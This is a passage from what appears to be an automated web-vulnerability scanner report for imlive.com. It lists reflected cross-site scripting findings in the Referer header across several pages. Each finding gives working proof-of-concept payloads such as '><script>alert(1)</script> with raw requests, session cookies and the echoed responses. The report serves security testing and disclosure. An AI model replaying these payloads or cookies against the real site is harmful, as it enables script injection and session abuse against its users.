Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /search.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=b9024'-alert(1)-'8f7cf0979cd

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0Qsll365UE8reLCPGZg%2bpu0PxjgT8zCCP45rr2S04rqh; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:35 GMT
Connection: close
Content-Length: 74452
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/&rf=http://www.google.com/search?hl=en^q=b9024'-alert(1)-'8f7cf0979cd&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.989. http://imlive.com/sitemap.html [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/sitemap.html

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e210'><script>alert(1)</script>f3991d075f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /sitemap.html HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=4e210'><script>alert(1)</script>f3991d075f5

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:10 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:11 GMT
Connection: close
Content-Length: 33816
Vary: Accept-Encoding

<html>
<head>
<meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html&lr=1107816008&ud=0&pe=sitemap.asp&rf=http://www.google.com/search?hl=en^q=4e210'><script>alert(1)</script>f3991d075f5&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.990. http://imlive.com/videosfr.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/videosfr.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 111ed'><script>alert(1)</script>4d6efbd9952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /videosfr.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=111ed'><script>alert(1)</script>4d6efbd9952

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:47 GMT
Connection: close
Content-Length: 15789
Vary: Accept-Encoding

<html>
   <head>
       <title>Video Chat Recorded on Webcam at ImLive</title>
       <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp&lr=1107816009&ud=0&pe=videosfr.asp&rf=http://www.google.com/search?hl=en^q=111ed'><script>alert(1)</script>4d6efbd9952&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.991. http://imlive.com/warningms.asp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/warningms.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff88f'><script>alert(1)</script>7d0fb5f5c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /warningms.asp HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ff88f'><script>alert(1)</script>7d0fb5f5c2

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:25:18 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:25:18 GMT
Connection: close
Content-Length: 14501
Vary: Accept-Encoding

<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp&lr=1107816008&ud=0&pe=warningms.asp&rf=http://www.google.com/search?hl=en^q=ff88f'><script>alert(1)</script>7d0fb5f5c2&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'>
...[SNIP]...

4.992. http://imlive.com/webcam-advanced-search/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-advanced-search/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad308'-alert(1)-'2250bef2d23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /webcam-advanced-search/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=ad308'-alert(1)-'2250bef2d23

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:58 GMT
Connection: close
Content-Length: 74454
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
"text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/&rf=http://www.google.com/search?hl=en^q=ad308'-alert(1)-'2250bef2d23&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.993. http://imlive.com/webcam-faq/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-faq/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fad7'-alert(1)-'8afcbd3f2d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /webcam-faq/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=2fad7'-alert(1)-'8afcbd3f2d9

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:52 GMT
Connection: close
Content-Length: 43821
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/&rf=http://www.google.com/search?hl=en^q=2fad7'-alert(1)-'8afcbd3f2d9&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.994. http://imlive.com/webcam-login/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-login/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5a5'-alert(1)-'88572b36594 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /webcam-login/ HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=9e5a5'-alert(1)-'88572b36594
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 21496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/login.aspx&he=imlive.com&ul=/webcam-login/&rf=http://www.google.com/search?hl=en^q=9e5a5'-alert(1)-'88572b36594&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.995. http://imlive.com/webcam-sign-up/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/webcam-sign-up/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7f4'-alert(1)-'eebadb10194 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /webcam-sign-up/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;
Referer: http://www.google.com/search?hl=en&q=4f7f4'-alert(1)-'eebadb10194

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:50 GMT
Connection: close
Content-Length: 40633
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/user.aspx&he=imlive.com&ul=/webcam-sign-up/&rf=http://www.google.com/search?hl=en^q=4f7f4'-alert(1)-'eebadb10194&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){
...[SNIP]...

4.996. http://imlive.com/wmaster.ashx [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://imlive.com
Path:	/wmaster.ashx

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9d2b'-alert(1)-'d37559930d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

